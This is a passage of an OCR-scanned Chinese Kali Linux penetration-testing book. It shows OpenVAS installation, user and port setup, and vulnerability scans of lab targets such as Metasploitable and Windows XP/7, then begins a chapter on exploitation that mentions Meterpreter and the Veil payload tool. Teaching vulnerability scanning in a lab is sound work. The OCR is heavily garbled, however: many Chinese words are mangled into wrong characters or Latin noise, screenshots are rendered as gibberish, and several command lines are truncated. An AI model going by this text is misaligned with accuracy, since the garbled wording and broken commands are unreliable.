Private key /var/lib/openvas/private/CA/cakey.pem 
. OpenVAS Server 

Certificate = /var/lib/openvas/CA/servercert.pem 

Private key = /var/lib/openvas/private/CA/serverkey.pem 
Press [ENTER] to exit 


俞 出 的 信息 显示 了 创建 的 OpenVAS 证 书 及 位 置 。 此 时 按 下 Enter 键 ， 退 出 程序 。 


(2) 使 用 OpenVAS NVT Feed 同 步 OpenVAS NVT 数 据 库 ， 并 且 更 新 最 新 的 漏洞 检 
查 。 执 行 命 分 如 下 所 示 : 


root@kali:/usr/share/openvas# openvas-nvt-sync 

[1] This script synchronizes an NVT collection with the 'OpenVAS N\ 
[i] The 'OpenVAS NVT Feed' is provided by 'The OpenVAS Project’. 
[i] Online information about this feed: 'http://www.openvas.org/op« 
[1] NVT dir: /var/lib/openvas/plugins 

[i] rsync is not recommended for the initial sync. Falling back on 
[1] will use wget 

[1] Using GNU wget: /usr/bin/wget 

[i] Configured NVT http feed: http://www.openvas.org/openvas-nvt -f« 
[1] Downloading to: /tmp/openvas-nvt-sync.xAKyyzYVdT/openvas -feed-: 
- -2014-04-25 14:35:48-- http://www.openvas.org/openvas-nvt-feed-cui 
正在 解析 主机 www.openvas.org (www.openvas.org).. 5.9.98.186 

正在 连接 WWW. openvas ,org (www.openvas.org)|5.9.98.186|:80.. 已 连接 。 

已 发 出 HTTP 请 求 ， 正 在 等 待 回应 .. 200 OK 

KE: 14771061 (14M) [application/x-bzip?2] 

EER : “/tmp/openvas-nvt-sync.xAKyyzYVdT/openvas -feed-2014-04-25 
2014-04-25 14:43:07 (33.1 KB/s) - 已 保存 /tmp/openvas-nvt-sync.xAKy\ 
2014-04-25-8214.tar.bz2” [14771061/14771061] ) 


12planet_chat_server_xss.nasl 
12planet_chat_server_xss.nasl.asc 
2013/ 

2013/secpod ms13-005.nasl.asc 
2013/gb astium voip pbx 51273.nasl 
2013/secpod ms13-001.nasl 

2013/deb 2597.nasl 

2013/gb astium voip pbx 51273.nasl.asc 
2013/secpod ms13-006.nasl 

2013/gb edirectory 57038.nasl 
2013/secpod ms13-006.nasl.asc 

… 省 略 部 分 内 容 .. 

zope zclass.nasl.asc 
zyxel http pwd.nasl 

zyxel http pwd.nasl.asc 

zyxel pwd.nasl 

zyxel pwd.nasl.asc 

[1] Download complete 

[1] Checking dir: ok 

[1] Checking MD5 checksum: ok 


I M Me 
输出 的 信息 显示 了 同步 OpenVAS NVT 数 据 库 的 信息 ， 并 也 更 新 了 所 有 的 漏洞 信 


2 
/NO 


(3) 创建 客户 疹 证 书库 。 执 行 命 分 如 下 所 示 : 





root@kali:/usr/share/openvas# openvas-mkcert-client -n om -i 
Generating RSA private key, 1024 bit long modulus 
十 十 十 十 十 十 


ere Sart t+ 

e 1S 65537 (0x10001) 

You are about to be asked to enter information that will be incorp: 
into your certificate request. 

What you are about to enter is what is called a Distinguished Name 
There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 

Country Name (2 letter code) [DE]:State or Province Name (full name 
Check that the request matches the signature 

Signature ok 

The Subject's Distinguished Name is as follows 


countryName : PRINTABLE: 'DE' 
localityName ‘PRINTABLE: 'Berlin' 
commonName ‘PRINTABLE: 'om' 


Certificate is to be certified until Apr 25 06:55:05 2015 GMT (365 
Write out database with 1 new entries 

Data Base Updated 

User om added to OpenVAS. 


al 5 
VA E48 HB fS ETI EME Pie Bee, ASD f omH P. 
(4) 重建 数据 库 。 执 行 合 分 如 下 所 示 : 





root@kali:/usr/share/openvas# openvasmd -rebuild 


执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 
(5) 和 启动 OpenVAS 扫 摘 ， 并 加 载 所 有 插件 。 执 行 命 令 如 下 所 示 : 


root@kali:/usr/share/openvas# openvassd 

Loading the OpenVAS plugins..base gpgme-Message: Setting GnuPG home 
base gpgme-Message: Using OpenPGP engine version '1.4.12' 

All plugins loaded 





从 输出 的 信息 中 可 以 看 到 所 有 插件 已 加 载 。 由 于 加 载 的 插件 比较 多 ， 所 以 执行 该 命 
人 的 时 间 会 长 一 操 。 


(6) 重建 并 创建 数据 库 的 备份 。 执 行 命 分 如 下 所 示 : 


root@kali:/usr/share/openvas# openvasmd --rebuild 
root@kali:/usr/share/openvas# openvasmd -backup 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 
(7) 创建 一 个 管理 OpenVAS 的 用 户 。 执 行 命 令 如 下 所 示 : 


root@kali:/usr/share/openvas# openvasad -c 'add user' -n openvasadr 
Enter password: 

ad main:MESSAGE:2732:2014-04-25 15h25.35 CST: No rules file provic 
ad main:MESSAGE:2732:2014-04-25 15h25.35 CST: User openvasadmin hé 


4| = | IÉI———————————" 
从 输出 的 信息 中 可 以 看 到 用 户 openvasadmin 被 成 功 创建 。 
(8) 创建 一 个 普通 用 户 。 执 行 命 分 如 下 所 示 : 
root@kali:/usr/share/openvas# openvas-adduser 
Using /var/tmp as a temporary file holder. 


Add a new openvassd user 





Login : lyw HA FAP Ss 
Authentication (pass/cert) [pass] : pass # 选 择 认 证 方式 
Login password : He mh 
Login password (again) : # 输 入 确认 密码 
User rules 


openvassd has a rules system which allows you to restrict the hosts that lyw has the right to test. 
For instance, you may want him to be able to scan his own host only. 

Please see the openvas-adduser(8) man page for the rules syntax. 

Enter the rules for this user, and hit ctrl-D once you are done: 


(the user can have an empty rules set) HET Ctrl+ 口 
Login > [yw 

Password mT 

Rules : 

Is that ok? (y/n) [v] y # 输 入 y， 提 变数 据 
user added. 


从 输出 的 信息 中 看 到 用 户 被 添加 。 
(9) 为 OpenVAS 配 置 端口 。 执 行 命 令 如 下 所 示 : 


root@kali:/usr/share/openvas# openvasmd -p 9390 -a 127.0.0.1 
root@kali:/usr/share/openvas# openvasad -a 127.0.0.1 -p 9393 
root@kali:/usr/share/openvas# gsad --http-only --listen=127.0.0.1 . 


a 


执行 以 上 命 爷 后 ，OpenVAS 的 新 口号 束 被 设置 为 9392。 








注意 : 9392 是 推荐 的 一 个 Web 浏 览 器 端口 。 用 户 也 可 以 选择 其 他 端口 号 。 
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(10) 在 浏览 器 中 输入 http:/127.0.0.1:9392/， 打 开 OpenVAS 登 录 界 面 ， 如 图 5.28 
Fra. 

Greenbone Security Assistant = lceweasel = Oo | x | 
File Edit View History Bookmarks Tools Help 
è Greenbone Security Assistant | i | 


m | @ 127.0.0.1:9392/login/Login.html v e 图 ~ Google 





B Most Visited’ [Offensive Security Ñ Kali Linux ‘Ñ Kali Docs » 


Greenbone Security Assistant 


ae ee 


Username |openvasadmin 


Password m | 


| Login | 





5.28 OpenVAS 登 录 界 面 


(11) 在 该 界面 输入 创建 的 用 户 名 和 密码 ， 然 后 单 击 Login 按 钮 ， 将 显示 如 图 5.29 
所 示 的 界面 。 


5.2 使 用 OpenVAS 195 


Sreenbone Security Assistant = lceweasel 
File Edit View History Bookmarks Tools Help 
db Greenbone Security Assistant | ua 
E 127.0.0.1 t ~@ IE- a & a 


加 Maat Visited" [Offensive Security “A Kali Linux & Kali Docas KfiExploit-DB.— W Aircrack-ng 





Gre Logged in as Ademin openvasadmin | Logout 


enbone 
e" security Assistant 





Fiber: apply .overridesz1 frst=1 rowsz 10 sort=name 


Stati Toral 


L HEN [ES 
5.29 OpenVAS 初 始 界 面 


关于 和 启动 DpenVAS 介 绍 一些 附 加 信息 。 每 次 运行 OpenVAS 时 ， 都 必须 要 做 以 下 工 
作 : 





CENT 





同步 NVT Feed (i3A3RBADSGII UR Susp, Ae RIAR) ; 
启动 OpenVAS 打 描 器 ; 

重建 数据 库 ; 

各 份 数 据 库 ; 

配置 端口 。 


为 了 节约 时 间 ， 下 面 特 介绍 编写 一 个 简单 的 Bash 脚 本 ， 方 便 用 户 和 启动 DpenVAS。 
保存 脚本 文件 名 为 OpenVAS sh, 并 放 该 文件 在 /root 文 件 夹 中 。 脚本 文件 内 容 如 下 
ATR : 


#!/bin/bash 

openvas-nvt-sync 

openvassd 

openvasmd --rebuild 

openvasmd --backup 

openvasmd -p 9390 -a 127.0.0.1 

openvasad -a 127.0.0.1 -p 9393 

gsad --http-only --listen-127.0.0.1 -p 9392 


编 守 好 该 脚本 时 ， 以 后 运行 OpenVAS 束 不 用 执行 多 条 命 全 了， 只 需要 执行 一 下 
OpenVAS .sh 脚本 就 可 以 了 。 


在 Kali 中 ，OpenVAS 也 提供 了 图 形 界面 。 启 动 OpenVAS 图 形 界面 的 方法 如 下 : 


Td FH 序 ”|Kali Linux| 8843 T |OpenVAS| openvas-gsd 命 
， 将 显示 如 图 5.30 所 示 的 界面 。 


Log in 


p Profile 
& | |" 


Please enter ackiress arc 
Ue? aciari for FOUT LCAM Save Delete 


engre 

















IF y d ect F th 1 
icons Serveraddress Port 


profile s, you only reed to 
enter the password. 


| | | 。 
Before you press the log in 127.0.0. 1 | 23390 Eg 
button you may store the 
access profile 

Username 
Note, that the scan engine 
must have OMP support | ; 
enabled for the gven port openvasadmin 


for a successful commecticon. 


Password 





“tik o & 


Log In | Cancel 


E 5.30 OpenVAS 图 形 登 录 界 面 
在 该 界面 输入 服务 器 的 地 址 127.0.0.1、 用 户 名 和 登录 窗 码 。 然 后 单 击 Log in 按钮 即 
可 登录 到 OpenVAS 服 务 器 。 


5.2.2 创建 Scan Config 和 扫描 任务 


通过 以 上 步骤 OpenVAS 珊 配置 好 了 ， 现 在 使 用 浏览 器 的 方 陈 登录 服务 器 。 在 该 服务 
器 中 新 建 Scan Config, Tee? ar Fai erem ee 
Sana pti i a Je dM Aste Ss, GAT $8. 络 漏洞 扫 搞 
eee eee Prd er E Ab Wh 须要 创建 Scan Config 
和 这 里 将 分 别 介 绍 这 些 配置 ， 方 便 后 面 的 使 用 。 


1. 新 建 Scan Config 
新 建 Scan Config 的 具体 操作 步骤 如 下 所 示 。 


(1) 在 服务 器 的 菜单 栏 中 依次 选择 Configuration|Scan Configs 人 命令， 如 图 5.31 所 
zh. 3d Scan Configs 命 分 后 ， 将 显示 如 图 5.32 所 示 的 界面 。 








Configuration 


Targets 


Port Lists 


Credentials 


Alerts 

Filters 
Schedules 
Report Formats 
Slaves 


Agents 





图 5.31 Scan Configs 


Scan Configs 1-5 of 5 (total 5) eee 



























































Filter: lrows= 10 first=1 sort=name m i 回 |-- :| 园 目 





(Empty and static configuration template.) a El 0 =] E Zu 
iier on PER by using: pasigus collecued information. 51 加 34594 加 e Eu 
rap that can stop services hosts; optimised by using previouwsty collected information.) 3 ùi MEH m - ü 
(mls ri pressoushy collected information: sic.) 21 E s 加 angg 
Full and very deep ultimate n Ds D asong 


(Mast NVT's including those that can Sop services hosts, don't bnust preseseushy collec ped information: dcr.) 


E] 5.32 Scan Configs 界 面 





(2) 从 该 界面 可 以 看 到 默认 总 共有 5 个 Scan Config. 
Scan Config) 图 标 ， 将 显示 如 图 5.33 所 示 的 界面 。 





— MC PED agr 
e" security Assistant 


Fri Apr 15 0751-3 7014 UTE 





Mew Scan Config 7E 
Hama Local Vulnerabilities 


Comment [optional] 


= Empty, static anc fast 
Bare 


Full and fasi 


Create Scan Config 





图 5.33 New Scan Config 


(3) 在 该 界面 设置 扫 拍 的 名 称 ， 这 里 设置 为 Local Vulnerabilities。 对 于 Base 选 择 
Empty, static and (ostia aA, RAMA PMSF eH tl 2B Cha. A 
单 击 Create Scan Config 按 钮 ， 将 会 看 到 新 建 的 配置 ， 如 图 5.34 所 示 。 


-一 li — AWTS 
mes] Oma 


| Local Vulnerabilities - ð = 7 








图 5.34 新 建 的 Local Vulnerabilities 


(4) 从 该 界面 可 以 看 到 新 建 的 Local Vulnerabilities， 要 编辑 该 配置 EM 
(Edit Scan Config) 图 标 。 创 建 好 Scan Config 后 需 选 择 打 描 的 内 容 。 此 时 单 击 


ta PHP 先 择 扫 朱 的 内 容 ， 如 图 5.35 所 示 。 


Edit Scan Config W E 





ae Local Vulnerabilitres 


Lomment (optional) 





Save Config 
Edit Network Vulnerability Test Families 
Complban e ald Uag 
Databases Oof 115 ne = 
Debian Local Security Checks O of 2899 Be Fa 
Default Accounts D of 68 gag 区 Fal 
Denial of Service à of £77 SLgI- i ea 
FTP O of 168 "Bez zi a 
Total: 0 Oofd =+ 

Save Config 


图 5.35 选择 扫 拍 内 容 


(5) 从 该 春 面 的 Family 栏 看 到 有 很 多 的 可 扫 折 信息， 此 时 将 Select all NVT's 栏 中 
的 复 选 框 勾 选 上 即 可 ， 设 置 完 后 ， 单 击 Save Config 按 钮 。 图 5.35 是 经 过 修改 后 的 一 
个 图 ， 该 界面 显示 的 内 容 较 多 ， EH T es Es AJ [ER EAT, 这 里 只 截取 了 一 部 分 。 


2. 新 建 目 标 
在 服务 器 的 菜单 栏 中 依次 选择 Configuration|Targets 命 令 ， 将 显示 如 图 5.36 所 示 的 
界面 。 


Greenbone 
Security Assistant 





Fitter: | rows210 firsta sort=name 


Lecalhost lag alPerat 1 Oper AS Default 


5.36 Targets R M 


MUN (New Target) 图 标 ， 将 显示 如 图 5.37 所 示 的 界面 。 





| New Target 7E 





| Mame | Local Vulnerabilities 

Hosts 

: 9 Manual (localhost 
From file! Browse... | No file selected. 

Comment (optional) | 

Port List All IANA assigned TCP 2012-02-10 : 

SSH Credential (optional) --|2 | on port|22 | 
| SMB Credential (optional) NE. 





Create Target 





El 5.37 新 建 Target 界 面 
在 该 界面 输入 Target 名 称 及 扫 摘 的 主机 。 然 后 单 击 Create Target 按 钮 ， 将 显示 如 图 
5.38 所 示 的 界面 。 

Mame Hosts [irs |rortuist, ssi credential | sme Credential | 


All DARA oes TCP 2012-02-10 pasou 
cu 





Local Vulnerabilities localhost — 1 


Localhast lochaos — 1 pent AS Default 


图 5.38 新 建 的 目标 
从 该 界面 可 以 看 到 新 建 的 Local Vulnerabilities 目 标 。 


3. 新 建 任务 


在 OpenVAS 的 菜单 栏 中 依次 选择 Scan Management|New Task 命 伟 ， 将 显示 如 
5.39 所 示 的 界面 。 


New Task E 





Name lLocal Vulnerabilities 


Comment (optional) | 














NE Local Vulnerabilities A 
Scan Targets Local Vulnerabilities * | 

Alerts (optional) - vl + | 

Schedule (optional) -- $ 

Slave (optional) - - 

Observers (optional) | 

Add results to Asset a fn 

Management x Leet tac 

Scan Intensity 

Maximum concurrently executed NVTs per host | 4 
Maximum concurrently scanned hosts 20 


Create Task 


图 5.39 新 建 任务 


在 该 界面 设置 任务 名 称 、Scan Config 和 Scan Targets， 然 后 单 击 Create Task 按 
将 显示 如 图 5.40 所 示 的 界面 。 


Tasks 1-1 of 1 (total: 1} LEM O 





Filter: apply overridesz 1 first21 rows=10 sort=name 


LENIN ruta E 


Local Vulnerabilities 





DZDBBAZZO 





图 5.40 新 建 的 任务 


— (Start) 图 标 ， 将 开始 漏洞 扫 搞 。 当 和 启动 该 扫 摘 任务 后 ， 按 钮 


sx 四 (Pause) ， 单 击 该 按钮 可 以 暂停 扫 摘 ， re m (Stop) 13 
止 扫 拍 。 


5.2.3 扫 拍 本 地 漏洞 


OpenVAS 人 允许 用 户 大 范围 打 描 漏洞 ， 并 且 交 限制 在 用 户 的 评估 列表 中 。 目 标 主机 的 
漏洞 指定 是 从 评估 中 获得 的 信息 。 本 小 节 将 介绍 使 用 OpenVAS 来 扫 摘 用 户 指定 本 地 
目标 系统 上 的 漏洞 。 扫 摘 本 地 漏洞 的 具体 操作 步骤 如 下 所 示 。 


(1) 新 建 名 为 Local Vulnerabilities 的 Scan Config。 
(2) 添加 扫描 的 类 型 ， 所 需 打 描 类 型 如 表 5-4 所 示 。 
表 5-4 打 描 的 类 型 


Compliance 扫描 Compliance 漏 洞 

Default Accounts 扫 拉 默认 账号 漏洞 

Denial of Service 扫 摘 拒绝 服务 漏洞 

FTP 43388 F TPAR 45-88 RS 8] 

Ubuntu Local Security Checks 13 ff Ubuntu R A BJ AWS ea 


(3) 创建 目标 系统 。 
(4) 创建 名 为 Local Vulnerabilities 打 描 任 务 。 
(5) 扫 摘 完 本 地 漏洞 的 显示 界面 如 图 5.41 所 示 。 





























Tasks 1-1ofi(teta:i1 SS & 


Filter: |apply_overrides=1 first=1 rows=10 sort=name 四 1--*| 国 目 


El Ed 








Local Vulnerabilities 


E 5.41 扫 摘 漏洞 完成 


(6) ni C. (Task Details) 图 标 ， 查 看 漏洞 打 描 的 详细 信息 。 显 示 
界面 如 图 5.42 所 示 。 


Task Details AAE Fe FEE 





Hame Local Vulnerabilities ID ab hac -a0z2 9 HERI C2 To ee ead Tdd'i 
— Creamed &ai Apr 6 CoO al 
Lait ice: Gap Apr Di Das 57 ta 














Scan Config: Local Vulnerabilities 


Schedule [Next due over] 
Target Leda Vulnerailirus 


Status —— 
Beart 1 [Finishad: 1] 





Observer: 

Add bo Asset ves 
Notes. ü 
herT kdes ü 


Scan Intensity 


Maximum concurrently executed NT: per host: 4. 
Maeimum concurrently scanned hosts 20 


Reports for *Local Vulnerabilities" 





= 


Sat Apr 26 (4:05:48 2014 
Done 


E] 5.42 扫 朱 的 详细 信息 


(7) 该 界面 显示 了 两 个 禄 口 ， 分 别 是 任务 详细 信息 和 本 地 漏洞 扫 拍 报告 信息。 用 
户 从 报告 信息 中 可 以 了 解 本 地 系统 是 否 漏洞 。 在 该 界面 单 击 Actions 栏 下 的 


a (Details) 图 标 可 以 查看 详细 情况 。 单 击 该 图 标 后 ， 将 显示 如 图 5.43 所 示 的 
界面 。 


Report Summary 轩 





Result of Task: Local Vulnerabilities 
Order of rel: by host 

Scan started; Sat Apr 26 07:25:19 2014 
SC am ete: Sat Ager 25 OF 25-24 2014 
Scan Satur | 


Full report 自 0 Put 
All filtered results ü ü 0 0 ü ü | por cf 
Filtés ded neuh ü ü Ü 0 0 a "iL por | 


图 5.43 报告 摘要 


(8) 在 该 界面 显示 了 所 有 信息 ， wang (Download) 图 标 
下 载 扫 拉 报告。 


9.2.4 扫 摘 网 2% TIER E 


AN | BH gts Open VAS ti — 刃 络 漏洞 。 这 些 漏 洞 的 信息 是 指 一 个 目标 网 络 
中 某 个 设备 的 信息 。 本 小 节 RM XP. Windows 7, Metasploitable 2.0 和 
Linux 和 有 系统 作为 目标 测试 系统 。 扫 拍 网 络 漏洞 的 具体 操作 步骤 如 下 所 示 。 


(1) 新 建 名 为 Network Vulnerability 的 Scan Config. 
(2) 添加 所 需 扫 摘 的 类 型 ， 如 表 5-5 所 示 。 
表 5-5 扫描 类 型 


Brute force attacks 
Buffer overflow 
CISCO 

Compliance 
Databases 

Default Accounts 
Denial of Service 
FTP 

Finger abuses 
Firewalls 

Gain a shell remotelly 
General 

Malware 

Netware 

NMAP NSE 
Peer-To-Peer File Sharing 
Port Scanners 
Privilege Escalation 
Product Detection 
RPC 

Remote File Access 
SMTP Problems 
SNMP 

service detection 


Settings 


INH 

13 T8 AX TF HH Al 

扫描 CISCO 路 由 器 
扫描 Compliance 漏 洞 
打手 数 据 库 漏洞 

扫 摘 黑 认 账号 漏洞 

打 搬 拒绝 服务 漏洞 
打手 FTP 服 务 妖 漏洞 
打 描 Finger 滥 用 漏洞 
扫 摘 防火 墙 漏洞 


扫 摘 获取 远程 Shell 的 漏洞 


扫 摘 漏 润 


扫 拍 网络 操作 系统 
扫 摘 NMAP NSE 漏 洞 


扫 朱 共 字 文件 漏洞 
扫 拍 奖 口 漏洞 
1318 5e 2 FF Al 
fate * anf 5x 
扫描 RPC 漏 洞 


扫 手 远程 文件 访问 漏洞 
扫描 SMTP 问 题 

扫描 SNMP 漏 洞 

扫 摘 服务 侦察 

扫 换 基本 设置 漏洞 


(3) 创建 名 为 Network Vulnerability 目标 系统 。 


(4) 创建 名 为 Network Scan 扫描 任务 。 
(5) 扫 摘 结果 ， 如 图 5.44 所 示 。 


Tasks 1-7of7(ter:7) 25a g 





Filter: apply rides=1] first=1 r fa + Bia TE 


Reports 
Status Total Trend Actions 
I umm 


Network Scan Apr 28 2014 | Wed | » ganno 
Apr 26 2014 | Medium | a EIEAAEU 








Windows Scan 





El 5.44 Network131& 25 R 

(6) 从 该 界面 可 以 看 到 整个 网 络 中 漏洞 的 情况 不 六 严重 ， 漏洞 状态 为 Medium。 & 
看 详细 漏洞 扫 摘 情况 的 方法 在 前 和 面 已 经 介绍 ， ix PRA Bik, 

5.2.5 13118 © Linux® 


本 小 节 将 介绍 使 用 OpenVAS 扫 描 指 定 Linux 系 统 的 漏洞 。 这 些 漏洞 信息 来 自在 一 个 
目标 网 络 中 指定 的 Linux 和 有 系统。 推荐 使 用 的 目标 Linux 系 统 为 Metasploitable 2.0 和 其 
他 任何 版 本 Linux。 扫描 指定 Linux 系 统 漏洞 的 具体 操作 步骤 如 下 所 示 。 


(1) 新 建 名 为 Linux Vulnerabilities 的 Scan Config。 
(2) 添加 所 需 的 扫 摘 类 型 ， 如 表 5-6 所 示 。 
表 5-6 打 描 的 类 型 


Brute force attacks 
Buffer overflow 
Compliance 
Databases 

Default Accounts 
Denial of Service 
FTP 

Finger abuses 

Gain a shell remotely 
General 

Malware 

Netware 

NMAP NSE 

Port Scanners 
Privilege Escalation 
Product Detection 
RPC 

Remote File Access 
SMTP Porblems 
SNMP 

Service detection 
Settings 


Web Servers 


INH 

13 FA AX T2 a HH 8 79] 

13 f Compliance? 
打手 数 据 库 漏洞 
eA Pk Seal 
13 TB TRAE, AR FY RS 9 

44 FHF T P B do Al 

打 描 Finger 滥 用 漏洞 

打 拉 获取 远程 Shell 漏 洞 


打 描 General 漏 洞 
扫 f KE 意 软 件 漏洞 


扫 摘 网 络 操作 系统 
扫描 NMAP NSE 漏 洞 
扫描 端口 漏洞 

扫 拉 提升 特权 漏洞 
1318 > oo SA 
扫描 RPC 漏 洞 

idi EXC Uu pm ds 
扫描 SMTP 问 题 
扫描 SNMP 漏 洞 

42 Té HI. F ni Al 
扫 摘 基本 设置 漏洞 
扫 拍 Web 服 务 漏 洞 


(3) 创建 Linux Vulnerabilities 目 标 系 统 。 
(4) 创建 Linux Scan 扫描 任务 。 
(5) 扫 拉 结果， 如 图 5.45 所 示 。 


Tasks 1-7of7 (total: 7 Bae E 





Filter: apply_overrides =] fest] 1] rows210 sort=name 


Linux ARR. Apr HE 2014 gango 
































图 5.45 Linux 打 描 结 果 


(6) 从 该 界面 可 以 看 到 目标 系统 中 有 非常 严重 的 漏洞 。 "NC. (Task 
Details) 图 标 ， 查 看 漏洞 打 描 的 详细 信息 ， 如 图 5.46 所 示 。 


| | | 





Mame: Linux m 0310b83d-aa! a-Efbb-3Ora-edd 1162 
Comment trated Mon Age DE OF Das Pid 

Sean Config: Linux Vulnerabilities Last Medified: Mon Age 28 07:00 06 2614 
Alerts: 

Schedule [Next due: over} 

Target Linum 

Sine 

Status ADSINT 

Reports: 1 (Finished: 1) 

Observer s 


Add to Asset yes 
Abo bes Ü 


Creerrides: 0 


Scan Intensity 
Maximum concurrently executed NYTs per hase 4 


Maximum caoncurnenthy scanned hess 20 


Reports for “Linux ™ 





Report Threat Actions 
= — NEL NEL lo — 


Mon Apr 28 07: 08:48 2014 > 5 128 o BED 





图 5.46 Task Details 
(7) 从 该 界面 的 扫 朱 报告 中 可 以 有 到 有 14 个 非 钊 严重 的 漏洞 信息 。 在 该 界面 的 


"EN. (Details) 图 标 查看 具体 漏洞 情况 ， 如 图 5.47 所 示 。 


Security Issues reported for 192.168.41.142 








Summary: 

distec 2x, as used in XCade 1.5 and others, when not configured to restrict 
access bo the server port, allows remobe attackers to execute arbitrary 
commands yia compilatsan jobs, which are exepubed bey the server without 
authorization checks. 

Solution: 

Vendor updates are available. Please see the references for more 
zifarmatear 


References 


CVE  CVE-2004-2687 
CERT: Warning: database nor available 
Other: http://distcc samba orgi security html 
http: ^web.rmed.nist gov viewéwuln/detasil'ssulnid s Cv E- 2004-2687 
hrtp wwe asidb.org! 13378 
hrtp Ut archives. nieohagsis com/amchhees bugtr ac! 2005-03/0183 homi 





E] 5.47 漏洞 消息 


(8) 该 界面 显示 的 信息 很 多 ， 由 于 篇 幅 的 原因 ， 这 里 只 截取 了 其 中 一 个 较 严 重 的 
源 洞 。 从 该 界面 可 以 看 到 192.168.41.142 目 标 主 机 上 存在 非常 严重 的 漏洞 。 漏 洞 信 
恩 包 括 目 标 主机 所 开发 的 痛 口 、OID 和 解决 方法 等 。 天 于 漏洞 的 报 各 可 以 使 用 表面 
介绍 过 的 方法 进行 下 载 。 


5.2.6 扫描 指定 Windows 系 统 漏 洞 
本 小 节 闻 介绍 使 用 OpenVAS 打 描 指 定 Windows 系 统 漏洞 。 这 些 漏洞 信息 来 自在 一 
个 目标 网 络 内 指定 的 Windows 目 标 系 统 。 这 里 推荐 的 目标 系统 为 Windows XP 和 
Windows 7。 
使 用 OpenVAS 打 描 指定 Windows 系 统 漏洞 的 上 县 体操 作 步 又 如 下 所 示 。 

(1) 新 建 名 为 Windows Vulnerabilities 的 Scan Config。 

(2) 添加 所 需 的 扫 摘 类 型 ， 如 表 5-7 所 示 。 
表 5-7 扫 摘 的 类 型 


Brute force attacks 
Buffer overflow 
Compliance 
Databases 

Default Accounts 
Denial of Service 
FTP 

Gain a shell remotely 
General 

Malware 

NMAP NSE 

Port Scanners 
Privilege Escalation 
Product Detection 
RPC 

Remote File Access 
SMTP Problems 
SNMP 

service detection 
Web Servers 
Windows 


Windows:Microsoft Bulletins 


JIN 

13388 2 Fe CAU Ra E 

13 ff Compliance] 
42 fa de HE s Al 

13 TIR, Pk Sel 
扫 摘 拒绝 服务 漏洞 
打手 FTP 服 务 妖 漏洞 
扫 摘 获取 远程 ShelI 的 漏洞 
扫 摘 General 漏 洞 

扫 摘 网络 操 作 和 有 系统 漏洞 
扫 朱 NMAP NSE 漏 洞 
扫描 端口 漏洞 

打手 提升 特权 漏洞 

扫 摘 产品 侦察 漏洞 


— 


扫 摘 远程 文件 访问 漏洞 

打 描 SMTP 问 题 漏洞 

扫描 SNMP 漏 洞 

打手 服务 侦察 漏洞 

扫 拍 Web 服 务 漏 洞 

13 fi Windows € ZA; Fal 

i3 fi Windows 7 4 (3 4X Bel 


(3) 创建 名 为 Windows Vulnerabilities El 5r 35 Zx., 
(4) 创建 名 为 Windows Scan 扫描 任务 。 
(5) 扫 摘 完成 后 ， 结 果 如 图 5.48 所 示 。 





Tasks 1 -4 of 4 (total: ese NM 


Filter lapp lyooverrides= 0 row s=10 first=1 sort=name 





Fd 


Local vulnerabilities 


Windows Scan — 








mm Secun 
Apr B6 oid Pore 日 5 ^T [T 


= gagag 





图 5.48 扫 摘 结果 
(6) 从 该 界面 可 以 看 到 Windows Scan 扫 挡 已 完成 ， 漏 洞 情况 为 Medium。 可 以 在 





该 界面 单 击 I (Task Details) 图 标 查看 详细 信息 ， 如 图 5.49 所 示 。 


Task Details 2 FFP PES 





Name: Windows Scan » en SIM AU EBERT ai 
Commeni Crem 5a Ap "| 014 
Scan Config Windows vulnerabilities pons air eres ea 
Alert 

tc heule (Next due aver] 

Target Wired ows vulnerabilities 

Save 

ak Á 

Reports: 1 (Finished: 1] 

Oba WET s 

Auld 15 Avus: es 

Notes ü 

Overrides ü 


Scan Intensity 
Maximum concurrently executed NYTs per host: 4 


Maimue comcurrentby scanned hosts Pal 


Reports for "Windows Scan" "T 





Sat Apr 26 06:41:46 2014 
Done 





图 5.49 Task Details 


(7) 从 该 界面 可 以 了 解 打 描 任 务 的 设置 及 扫描 报告 信息 ， 如 打 描 完成 的 时 间 、 漏 
洞 情况 及 日 志 。 如 果 想 查看 更 详细 的 报告 ， 使 用 前 面 介 绍 过 的 方法 下 载 扫 摘 报 告 。 


第 6 章 ”漏洞 利用 


漏洞 利用 是 获得 系统 控制 权限 的 重要 途径 。 用 户 从 目标 系统 中 找到 容易 攻击 的 漏 
洞 ， 然 后 利用 该 漏洞 获取 权限 ， 从 而 实现 对 目标 系统 的 控制 。 为 了 便于 用 户 练习 ， 
本 章 将 介绍 Metasploit 发 布 的 Metasploitable 2。 用 户 可 以 将 其 作为 练习 用 的 Linux 操 
作 系 统 。 本 章 将 利用 Metasploitable 条 统 上 存在 的 漏洞 ， 介 绍 各 种 渗透 攻击 ， 如 


MySQL 数 据 库 、PostgreSQL 数 据 库 及 Tomcat 服 务 等 ， 其 主要 知识 点 如 下 : 
e Metasploitable 操 作 系 统 ; 
e Metasploit 基 础 ; 
e 控制 Meterpreter ; 
e 渗透 攻击 应 用 ; 
e 钢 杀 Payload 生 成 工具 Veil。 


6.1 Metasploitable 操 作 系 统 


Metasploitable 是 一 款 基于 Ubuntu Linux 的 操作 系统 。 该 系统 是 一 个 虚拟 机 文件 ， 从 
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 网 站 下 载 解 不 
之 后 可 以 直接 使 用 ， 无 需 安装 。 由 于 基于 Ubuntu， 所 以 Metasploitable 使 用 起 来 十 
分 得 心 应 手 。 Metasploitable 殊 是 用 来 作为 攻击 用 的 夸 机 ， 所 以 它 存 在 大 量 未 打 补 
丁 漏洞 ， 并 且 开 放 了 无 数 高 危 颗 口 。 本 节 料 介绍 安 Metasploitable 虚 拟 机 的 使 用 。 


安装 Metasploitable 2 的 具体 操作 步骤 如 下 所 示 。 
(1) 下 载 Metasploitables 2， 其 文件 名 为 Metasploitable-Linux-2.0.0.zip。 
(2) 将 下 载 的 文件 解压 到 本 地 磁盘 。 


(3) 打开 VMwareWorkstation， 并 依次 选择 "文件 打开?” 命 分 ， 将 显示 如 图 6.1 所 
示 的 界面 。 





ESL. m WE Matasplodable2-Linux p 





| 5 FE di Metasplortable.wmdksick 2014/4/28 10:54 
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& siema (C) * Metasplortable.vmx 2014/4/28 10:54 VMX EA 
ca Doe (D:) 
ca HOw (E) 
直 CD Emi (H:) - 
ca TEAR (1 
Gi share (1192.16 
= 4 n s 
THEIN): ~ | 所 有 支持 的 文 性 - 
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6.1 选择 Metasploitable 2 启动 


